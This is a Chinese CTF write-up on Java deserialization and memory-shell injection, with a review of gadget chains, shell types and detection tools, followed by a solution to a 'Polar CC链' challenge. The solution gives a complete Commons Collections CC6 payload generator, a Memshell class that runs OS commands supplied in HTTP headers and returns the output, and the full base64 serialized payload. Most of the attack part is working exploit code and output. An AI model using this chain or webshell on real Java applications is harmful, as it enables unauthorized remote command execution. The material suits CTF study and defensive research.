java反序列化结合内存马注入

前面学习了java 的cc链子和内存马的基础知识之后后续去做ctf 题目发现还是不会写

因为像我这中代码量不多 java没什么基础的就是配置这个题目的环境都要研究半天也是搁置了好久才开始继续研究这个方面的知识

还是先来回顾简单回顾一下反序列化和内存马的知识

一、Java 反序列化漏洞

1. 什么是反序列化漏洞？

定义：当应用在反序列化过程中未验证数据来源且类路径中存在可利用 Gadget 类时，攻击者可构造恶意对象执行任意代码。
核心问题：执行了 readObject() 等方法，且对象内容可控。

2. 反序列化常见入口

ObjectInputStream.readObject()
框架内部（如 RMI、JMX、Spring HTTP invoker、Fastjson、Jackson）

3. 利用链构建思路

目标：构造一个对象链，在反序列化过程中触发任意代码执行。
方法：利用已有的库（CommonsCollections、Groovy 等）构造 Gadget 链。
工具：ysoserial 常用于生成利用 payload。

示例链（CommonsCollections1）：

Runtime.getRuntime().exec("calc");

链条结构大致为：
AnnotationInvocationHandler → TemplatesImpl → Runtime.exec

4. 关键类与方法

类名	危险方法
`ObjectInputStream`	`readObject()`
`HashMap`	`hashCode()`
`TemplatesImpl`	`getOutputProperties()`
`BeanComparator`	`compare()`

二、Java 内存马（Memory Shell）

1. 定义与原理

定义：一种利用内存加载方式长期驻留在服务中的 WebShell。
优点：无文件落地，难以被传统查杀手段发现。

2. 注入载体分类

类型	说明
Filter 内存马	动态注册 Filter 组件，拦截指定请求
Servlet 内存马	注册 Servlet 并设置访问路径
Listener 内存马	监听请求事件，实现后门逻辑
Agent 内存马	通过 Java Agent 注入内存代码（字节码插桩）

3. 注入方式

✅ 反射注册 Filter（Tomcat 示例）：

Field contextField = application.getClass().getDeclaredField("context");
...
filterDef.setFilterClass("MyMemoryShell");
context.addFilterDef(filterDef);

✅ `defineClass()` 动态加载字节码

Class<?> clazz = defineClass(null, byteCode, 0, byteCode.length);
clazz.newInstance();

✅ 使用 ClassLoader 注入：

Thread.currentThread().getContextClassLoader().loadClass("MyShell");

4. 隐蔽技巧

设置自定义 Header 触发执行
使用随机路径或 Referer 验证
结合加密参数进行命令传递

5. 检测与对抗手段

手段	工具
查看运行中的 Filter/Servlet	`JMX`、`Arthas`、`Jolokia`
内存扫描	`JVMTI agent`、`JVM-Sandbox`
检查类加载器	`jcmd VM.class_hierarchy`
启用权限控制	`SecurityManager`（已废弃，但可参考其思路）

三、关联利用场景

反序列化 → 内存马注入
- 利用反序列化漏洞加载字节码并注册内存马组件（常见于 Tomcat、Spring 环境）
RCE 链 + 内存马持久化
- 利用漏洞拿到执行权限后，通过 defineClass() 注入内存马，实现长时间控制

那么在利用这两个漏洞结合的漏洞中基本上都是处于不能够反弹shell ，没有出网的环境然后需要拿到一个正向的shell 结合注入内存马进行下一步的操作、

Polar CC链

下载给的附件源码

在RradController.class 文件中很明显的发现有java反序列化漏洞

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package org.polar.ctf.controller;

import org.polar.ctf.util.Tools;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
public class ReadController {
    public ReadController() {
    }

    @RequestMapping({"/read"})
    @ResponseBody
    public String getObj(String obj) throws Exception {
        byte[] Bytes = Tools.base64Decode(obj);
        Object Obj = Tools.deserialize(Bytes);
        return Obj.toString();
    }
}

而且有cc的依赖题目环境也是不出网的那么就可以直接注入内存马

这里使用CC6来注入内存马

cc6

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import static org.Guofen.Tools.*;

import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class test {
    public static void main(String[] args) throws Exception {
        String a = base64Encode(serialize(cc6_poc()));
        System.out.println(a);
    }

    public static Object cc6_poc() throws Exception{
        byte[] bytes = Files.readAllBytes(Paths.get("D:\\CTF\\temp\\Gu0f3n\\target\\classes\\org\\Guofen\\Memshell.class"));
        TemplatesImpl templates = (TemplatesImpl) getTemplates(bytes);

        Transformer transformer = new InvokerTransformer("getClass", null, null);
        //生成LazyMap对象并将其传给TiedMapEntry
        Map<Object,Object> lazymap = LazyMap.decorate(new HashMap<>(), transformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,templates);

        HashMap<Object,Object> map = new HashMap<>();
        map.put(tiedMapEntry,"bbb");     //在put的时候lazymap里的factory属性是空，就不会触发hash
        lazymap.remove(templates);      //让LazyMap的factory属性置空
        setValue(transformer,"iMethodName","newTransformer");
        return map;
    }

    public static Object getTemplates(byte[] bytes) throws Exception {
        Templates templates = new TemplatesImpl();
        setValue(templates, "_bytecodes", new byte[][]{bytes});
        setValue(templates, "_name", "Infernity");
        setValue(templates, "_tfactory", new TransformerFactoryImpl());
        return templates;
    }

    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

内存马

package org.Guofen;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Memshell extends AbstractTranslet {
    static {
        org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
        javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
        javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
        String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows")? new String[]{"cmd.exe", "/c", httprequest.getHeader("Infernity")} : new String[]{"/bin/sh", "-c", httprequest.getHeader("Gu0f3n")};
        byte[] result = new byte[0];
        try {
            result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        try {
            httpresponse.getWriter().write(new String(result));
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        try {
            httpresponse.getWriter().flush();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        try {
            httpresponse.getWriter().close();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

运行一下

rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0/BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAANn8r+ur4AAAA0AKUKACYAUQoAUgBTBwBUCgADAFUKAAMAVggAVwoAWABZCgALAFoIAFsKAAsAXAcAXQgAXggAXwgAYAsAYQBiCABjCABkCABlBwBmBwBnCgAUAGgKABQAaQoAagBrCgATAGwIAG0KABMAbgoAEwBvCgALAHAHAHEHAHIKAB4AcwsAdAB1CgALAHYKAHcAeAoAdwB5CgB3AHoHAHsHAHwBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAFUxvcmcvR3VvZmVuL01lbXNoZWxsOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwB9AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBABFyZXF1ZXN0QXR0cmlidXRlcwEAO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXM7AQALaHR0cHJlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAxodHRwcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQADY21kAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQANU3RhY2tNYXBUYWJsZQcAfgcAfwcAgAcARQcARwcAcQEAClNvdXJjZUZpbGUBAA1NZW1zaGVsbC5qYXZhDAAnACgHAIEMAIIAgwEAQG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9TZXJ2bGV0UmVxdWVzdEF0dHJpYnV0ZXMMAIQAhQwAhgCHAQAHb3MubmFtZQcAiAwAiQCKDACLAIwBAAd3aW5kb3dzDACNAI4BABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jAQAJSW5mZXJuaXR5BwB/DACPAIoBAAcvYmluL3NoAQACLWMBAAZHdTBmM24BABFqYXZhL3V0aWwvU2Nhbm5lcgEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgwAJwCQDACRAJIHAJMMAJQAlQwAJwCWAQACXEEMAJcAmAwAmQCMDACaAJsBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MACcAnAcAgAwAnQCeDAAnAJ8HAKAMAKEAogwAowAoDACkACgBABNvcmcvR3VvZmVuL01lbXNoZWxsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAOW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlcwEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAFGdldFJlcXVlc3RBdHRyaWJ1dGVzAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOwEACmdldFJlcXVlc3QBACkoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAt0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